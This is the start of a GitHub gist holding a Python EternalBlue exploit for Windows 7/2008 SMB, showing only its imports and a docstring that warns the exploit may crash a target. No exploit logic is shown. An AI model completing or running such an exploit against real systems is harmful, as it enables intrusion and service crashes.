Skip to content

Instantly share code, notes, and snippets.

@v3t3a
v3t3a / eternalblue7_exploit.py
Created May 19, 2017 11:57 — forked from worawit/eternalblue7_exploit.py
Eternalblue exploit for Windows 7/2008
#!/usr/bin/python
from impacket import smb
from struct import pack
import os
import sys
import socket
'''
EternalBlue exploit for Windows 7/2008 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)